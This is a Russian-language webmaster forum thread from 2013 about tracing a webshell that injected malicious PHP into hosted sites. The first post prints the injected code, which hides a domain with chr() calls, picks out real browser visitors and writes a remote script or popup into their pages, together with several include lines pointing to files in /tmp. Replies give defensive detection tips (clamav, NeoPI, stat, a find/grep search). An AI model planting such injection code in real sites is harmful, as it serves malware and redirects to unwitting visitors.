Master-X
Регистрация
|
Вход
Форум
|
Новости
|
Статьи
Главная
»
Форум
»
Хостинги / Домены / Железо
»
Тема:
Как найти вебшелл ?
Новая тема
Ответить
цитата
10/11/13 в 11:47
xDiver
обнаружил на некоторых своих сайтах странный инклуд и резкое падение трафа
$qi='/tmp/.ICE-unix/w';@include_once($qi);
и
$qi='/tmp/.ICE-unix/w';@include($qi);
в самом файле вот такой код
Код:
<?php
$qout=($qout)?$qout:'(/out.php|/st/st.php|/scj/cgi/out.php|/dtr/link.php)';
if(!$_COOKIE['qc'] && ((!$_SERVER['HTTP_X_REAL_IP'] && preg_match("%keep-alive%i", $_SERVER['HTTP_CONNECTION'])) || $_SERVER['HTTP_X_REAL_IP']) && $_SERVER['HTTP_USER_AGENT'] && !preg_match("%bot%i",$_SERVER['HTTP_USER_AGENT']) && preg_match("%(msie|chrome|firefox)%i",$_SERVER['HTTP_USER_AGENT']) && $_SERVER['HTTP
error_reporting(0);$qd=chr(120).chr(116).chr(119).chr(120).chr(116).chr(46).chr(99).chr(111).chr(109);
if($qi && $_SERVER['HTTP_REFERER'] && !preg_match("%{$_SERVER['HTTP_HOST']}%i", $_SERVER['HTTP_REFERER'])){echo "<script src='http://{$qd}/'></script>";}
elseif (is_array($_COOKIE) && $_SERVER['HTTP_REFERER'] && preg_match("%{$_SERVER['HTTP_HOST']}%i", $_SERVER['HTTP_REFERER']) && preg_match("%$qout%i", $_SERVER['SCRIPT_NAME'])){header("Set-Cookie: qc=1; path=/; expires=". gmdate('D, d-M-Y H:i:s', time()+604800) ." GMT;");echo "<html><body><script>var wo=window.ope
}
?>
подскажите как найти сам шелл через который заливают эту дрянь ?
самое интересное что дата последнего изминения php файла куда вставляется инклуд - не меняется
цитата
10/11/13 в 11:49
S_Flash
А я писал недвано об этом.
Smart Thumbs - снова старая песня. Проверяем.
Почти никто не обратил внимание. Но своих трейдеров я предупредил в месенджерах.
цитата
10/11/13 в 12:12
xDiver
S_Flash:
спасибо за линк. Смарт тумбса и смарт сж не было, но я уже походу догадался как и что, я перенес домен один пару дней назад с сервера где был смарт тумбс и смартсж, и вот перенес уже с вебшелом (нашел кстати его)
цитата
10/11/13 в 13:20
raider
расскажи как нашел?
цитата
10/11/13 в 13:51
TubeTraffic
clamav ищет нормально и NeoPI
цитата
10/11/13 в 13:56
Evial
xDiver писал:
самое интересное что дата последнего изминения php файла куда вставляется инклуд - не меняется
Время изменения файла можно подделать с помощью команды touch. На фре stat -x filename нужно смотреть поле Change, его подделать нельзя, на линуксятине просто stat filename.
цитата
10/11/13 в 15:18
raider
Pika писал:
clamav ищет нормально и NeoPI
можно попроще?
я только ubuntu трогаю еще
Последний раз редактировалось: raider (
10/11/13 в 15:33
), всего редактировалось 1 раз
цитата
10/11/13 в 15:20
Jacob
man clamcheck
цитата
10/11/13 в 21:53
xDiver
нашел банально !! начал смотреть подозрительные файлы на фтп, но сам понимал что маловероятно что сходу что-то замечу. Но мне повезло, нашел в папке /images пхп файл, а я никогда и нигде в имеджи исполняющии файлы не клал - это и привлекло сразу мое внимание. Потом просто вязл кусок закодированного в base64 кода и командой
Код:
find /home/sites/ -name \*.php -type f -exec grep -l "кусок кода" {} \;
прошелся в хоум дире и нашел копии вебшела
потом еще так же прошелся на предмет инклуда вебшела, у меня вот такие варианты были:
Код:
$qi='/tmp/.ICE-unix/t';@include($qi);
@$f='/tmp/cache';if(is_file($f))require($f);
$qi='/tmp/.ICE-unix/t';@include_once($qi);
на некоторых сайтах очень давно стоял код как мне кажется ..
цитата
10/11/13 в 23:35
S_Flash
Я зашёл на свои сайты, которым уже по 10 лет или больше на SmartThumbs, где нет даже банерной рекламы ифреймовой и тут каспер говорит, что есть попытка открыть вредоносный урл. Дебаггер и хедеры сразу подлсказали, где копать. Воторой заход с этого же браузере\IP уже не палилися.
Админы просканили сервер и /st/admin/variables.php как всегда отличился. Но судя по содержимому гадости, там заготовка не только для ST:
Smart Thumbs - снова старая песня. Проверяем.
Новая тема
Ответить
Эта страница в полной версии